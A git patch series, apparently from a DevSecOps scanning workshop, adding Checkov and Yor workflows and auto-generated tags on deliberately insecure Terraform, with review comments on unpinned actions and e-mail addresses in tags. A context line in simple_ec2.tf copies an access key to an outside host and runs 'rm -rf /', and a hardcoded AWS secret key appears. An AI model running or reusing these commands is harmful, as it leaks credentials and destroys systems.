From 58d473b443a1eaf9a34aedb445101d69a1add658 Mon Sep 17 00:00:00 2001
From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com>
Date: Wed, 12 Mar 2025 12:09:38 -0400
Subject: [PATCH 1/5] Create checkov.yaml
---
.github/workflows/checkov.yaml | 35 ++++++++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 .github/workflows/checkov.yaml
diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml
new file mode 100644
index 000000000..9f7240507
--- /dev/null
+++ b/.github/workflows/checkov.yaml
@@ -0,0 +1,35 @@
+name: checkov
+on:
+ pull_request:
+ push:
+ branches:
+ - main
+jobs:
+ scan:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read # for actions/checkout to fetch code
+ security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results
+
+ steps:
+ - uses: actions/checkout@v2
+
+ - name: Run checkov
+ id: checkov
+ uses: bridgecrewio/checkov-action@master
+ with:
+ directory: code/
+ #soft_fail: true
+ #api-key: ${{ secrets.BC_API_KEY }}
+ #env:
+ #PRISMA_API_URL: https://api4.prismacloud.io
+
+ - name: Upload SARIF file
+ uses: GitHub/codeql-action/upload-sarif@v2
+
+ # Results are generated only on a success or failure
+ # this is required since GitHub by default won't run the next step
+ # when the previous one has failed. Alternatively, enable soft_fail in checkov action.
+ if: success() || failure()
+ with:
+ sarif_file: results.sarif
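Review bot: `uses: bridgecrewio/checkov-action@master` pulls a mutable branch head into a job that holds `security-events: write`, so whatever lands on that branch — including an upstream compromise — runs with that token on every push and pull request; pin to a full commit SHA with the version noted alongside, e.g. `uses: bridgecrewio/checkov-action@<commit-sha>  # vX.Y.Z` (placeholder — take the SHA from the release you intend). `actions/checkout@v2` and `GitHub/codeql-action/upload-sarif@v2` are major-version tags that upstream can move as well, and the v2 checkout runs on a Node runtime GitHub has since deprecated, so bump and pin those in the same pass. For `pull_request` runs from forks the GITHUB_TOKEN is read-only regardless of the `permissions` block, so the SARIF upload step will presumably fail there rather than upload — worth either documenting above `security-events: write` or gating the upload on `github.event.pull_request.head.repo.full_name == github.repository`.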
From 313480c4ea9ce87336acdeac3807d0d08c454a92 Mon Sep 17 00:00:00 2001
From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com>
Date: Wed, 12 Mar 2025 12:13:04 -0400
Subject: [PATCH 2/5] Create yor.yaml
---
.github/workflows/yor.yaml | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 .github/workflows/yor.yaml
diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml
new file mode 100644
index 000000000..a16506910
--- /dev/null
+++ b/.github/workflows/yor.yaml
@@ -0,0 +1,19 @@
+name: IaC tag and trace
+
+on:
+ push:
+ pull_request:
+
+jobs:
+ yor:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: write
+
+ steps:
+ - uses: actions/checkout@v2
+ name: Checkout repo
+ with:
+ fetch-depth: 0
+ - name: Run yor action
+ uses: bridgecrewio/yor-action@main
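Review bot: `uses: bridgecrewio/yor-action@main` together with `contents: write` lets an unpinned upstream branch head push commits into this repository on every `push` and `pull_request` event; pin it to a full commit SHA, `uses: bridgecrewio/yor-action@<commit-sha>  # vX.Y` (placeholder), so a change on that branch cannot silently gain write access here, and pin `actions/checkout@v2` the same way. Since `push:` carries no branch filter and Yor commits its tag changes back (PATCH 3/5 shows such a bot commit), the write-back will re-trigger this workflow — presumably a no-op second run, but a `branches:` filter would make that explicit. On `pull_request` events from forks the token is read-only, so the tagging push will fail there rather than tag. The same file is deleted in PATCH 4/5 and re-created byte-identically in PATCH 5/5 (same blob index a16506910), so this note applies to that hunk too.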
From f7c69a0c7c47c958707e28bc59060a42f7db1cb6 Mon Sep 17 00:00:00 2001
From: "github-actions[bot]"
<41898282+github-actions[bot]@users.noreply.github.com>
Date: Wed, 12 Mar 2025 16:13:26 +0000
Subject: [PATCH 3/5] Update tags (by Yor)
---
code/deployment_ec2.tf | 150 ++++++++++++++++++++++++++++++++++++++---
code/deployment_s3.tf | 76 +++++++++++++++++++--
code/simple_ec2.tf | 11 +++
code/simple_s3.tf | 11 ++-
4 files changed, 233 insertions(+), 15 deletions(-)
diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf
index 7e3d2bba2..cf68fecde 100644
--- a/code/deployment_ec2.tf
+++ b/code/deployment_ec2.tf
@@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY
export AWS_DEFAULT_REGION=us-west-2
echo "
Deployed via Terraform
" | sudo tee /var/www/html/index.html
EOF
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_host"
+ yor_trace = "13ef843f-00de-4552-bb63-826236822e2d"
+ }
}
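Review bot: Every generated `tags` block writes `git_last_modified_by = "tprendervill@paloaltonetworks.com"`, an individual's e-mail address, into the tags of each AWS resource, where it becomes readable by any principal with tag-read access and surfaces in cost and inventory exports — personal data leaving version control for the cloud account. The same tag is added to every resource in this commit across `code/deployment_ec2.tf`, `code/deployment_s3.tf`, `code/simple_ec2.tf` and `code/simple_s3.tf`. If the traceability of `git_commit` and `yor_trace` is wanted without the PII, exclude that tag via Yor's `--skip-tags` option (check the matching yor-action input name) and re-run the tagger; `git_modifiers = "tprendervill"` carries most of the same information in a less sensitive form. The enclosing `aws_instance` block begins above this hunk.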
resource "aws_ebs_volume" "web_host_storage" {
@@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" {
availability_zone = "${var.region}a"
#encrypted = false # Setting this causes the volume to be recreated on apply
size = 1
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_host_storage"
+ yor_trace = "7051d875-9e7c-450b-bf99-51be80352ed8"
+ }
}
resource "aws_ebs_snapshot" "example_snapshot" {
# ebs snapshot without encryption
volume_id = "${aws_ebs_volume.web_host_storage.id}"
description = "${local.resource_prefix.value}-ebs-snapshot"
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "example_snapshot"
+ yor_trace = "39d87c2c-74c1-49aa-8c3d-9fe3a4cc69a4"
+ }
}
resource "aws_volume_attachment" "ebs_att" {
@@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" {
"0.0.0.0/0"]
}
depends_on = [aws_vpc.web_vpc]
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web-node"
+ yor_trace = "7efd7cf8-ce2f-4dce-ac95-a9de7a0f1d1f"
+ }
}
resource "aws_vpc" "web_vpc" {
cidr_block = "172.16.0.0/16"
enable_dns_hostnames = true
enable_dns_support = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_vpc"
+ yor_trace = "66e659a2-04df-4373-b434-c6bdbf7d12b8"
+ }
}
resource "aws_subnet" "web_subnet" {
@@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" {
availability_zone = "${var.region}a"
map_public_ip_on_launch = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_subnet"
+ yor_trace = "8437183a-ec4d-4162-ac0f-e13bf8dcc679"
+ }
}
resource "aws_subnet" "web_subnet2" {
@@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" {
availability_zone = "${var.region}b"
map_public_ip_on_launch = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_subnet2"
+ yor_trace = "edc1ae57-90e4-444b-b536-9eeb09e252bf"
+ }
}
resource "aws_internet_gateway" "web_igw" {
vpc_id = aws_vpc.web_vpc.id
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_igw"
+ yor_trace = "1b1fad7c-2d09-4997-a7b0-fd868ae22bba"
+ }
}
resource "aws_route_table" "web_rtb" {
vpc_id = aws_vpc.web_vpc.id
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web_rtb"
+ yor_trace = "2e00c9cc-64a9-4298-8337-a2fa10b73e7a"
+ }
}
resource "aws_route_table_association" "rtbassoc" {
@@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" {
subnet_id = aws_subnet.web_subnet.id
private_ips = ["172.16.10.100"]
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "web-eni"
+ yor_trace = "b7117ddd-66fe-45c9-8580-1d302cabb2b3"
+ }
}
# VPC Flow Logs to S3
@@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" {
vpc_id = aws_vpc.web_vpc.id
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "vpcflowlogs"
+ yor_trace = "b8c6c95b-b70a-4be0-b766-d1a9eefb0037"
+ }
}
resource "aws_s3_bucket" "flowbucket" {
bucket = "${local.resource_prefix.value}-flowlogs"
force_destroy = true
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "flowbucket"
+ yor_trace = "baf7a387-0aa5-48d0-80cd-a477081ba407"
+ }
}
# OUTPUTS
diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf
index cfb272e1d..b594872ce 100644
--- a/code/deployment_s3.tf
+++ b/code/deployment_s3.tf
@@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" {
# bucket does not have versioning
bucket = "${local.resource_prefix.value}-data"
force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "data"
+ yor_trace = "e1850928-c651-4191-b6a9-ec49e1f7fb06"
+ }
}
resource "aws_s3_bucket_object" "data_object" {
bucket = aws_s3_bucket.data.id
key = "customer-master.xlsx"
source = "resources/customer-master.xlsx"
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "data_object"
+ yor_trace = "d6b52295-bc27-4602-a169-0117b3c26f85"
+ }
}
resource "aws_s3_bucket" "financials" {
@@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" {
acl = "private"
force_destroy = true
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "financials"
+ yor_trace = "b9d4aeee-9d0b-4269-a907-a43d2f1cc059"
+ }
}
resource "aws_s3_bucket" "operations" {
@@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" {
enabled = true
}
force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "operations"
+ yor_trace = "f799015f-f3a8-43f5-8927-9362a02b1670"
+ }
}
resource "aws_s3_bucket" "data_science" {
@@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" {
target_prefix = "log/"
}
force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "data_science"
+ yor_trace = "499ec48c-8360-4c18-a960-9744be19b221"
+ }
}
resource "aws_s3_bucket" "logs" {
@@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" {
}
}
force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "logs"
+ yor_trace = "c52224d3-11d7-4268-895a-942e3f1d188e"
+ }
}
diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf
index dcfa5880f..f89e11b17 100644
--- a/code/simple_ec2.tf
+++ b/code/simple_ec2.tf
@@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" {
command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' "
}
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/simple_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "test"
+ yor_trace = "99e2c099-abb6-4d53-acad-97c6f00b271d"
+ }
}
diff --git a/code/simple_s3.tf b/code/simple_s3.tf
index c0d25fb60..dec364820 100644
--- a/code/simple_s3.tf
+++ b/code/simple_s3.tf
@@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" {
bucket_prefix = "dev-"
tags = {
- Environment = "Dev"
+ Environment = "Dev"
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/simple_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "RajithSangireddy"
+ git_repo = "prisma-cloud-devsecops-workshop"
+ yor_name = "dev_s3"
+ yor_trace = "624c8def-dc33-4f46-ab6a-53f121877049"
}
}
From 45ede349bb7b20ad338ac69a013979d9fd8bac5b Mon Sep 17 00:00:00 2001
From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com>
Date: Wed, 12 Mar 2025 12:26:37 -0400
Subject: [PATCH 4/5] Delete .github/workflows/yor.yaml
---
.github/workflows/yor.yaml | 19 -------------------
1 file changed, 19 deletions(-)
delete mode 100644 .github/workflows/yor.yaml
diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml
deleted file mode 100644
index a16506910..000000000
--- a/.github/workflows/yor.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: IaC tag and trace
-
-on:
- push:
- pull_request:
-
-jobs:
- yor:
- runs-on: ubuntu-latest
- permissions:
- contents: write
-
- steps:
- - uses: actions/checkout@v2
- name: Checkout repo
- with:
- fetch-depth: 0
- - name: Run yor action
- uses: bridgecrewio/yor-action@main
From 5e4b8817047f341dae8553aa2f3dc9d8ad351fe0 Mon Sep 17 00:00:00 2001
From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com>
Date: Wed, 12 Mar 2025 12:28:26 -0400
Subject: [PATCH 5/5] Create yor.yaml
---
.github/workflows/yor.yaml | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 .github/workflows/yor.yaml
diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml
new file mode 100644
index 000000000..a16506910
--- /dev/null
+++ b/.github/workflows/yor.yaml
@@ -0,0 +1,19 @@
+name: IaC tag and trace
+
+on:
+ push:
+ pull_request:
+
+jobs:
+ yor:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: write
+
+ steps:
+ - uses: actions/checkout@v2
+ name: Checkout repo
+ with:
+ fetch-depth: 0
+ - name: Run yor action
+ uses: bridgecrewio/yor-action@main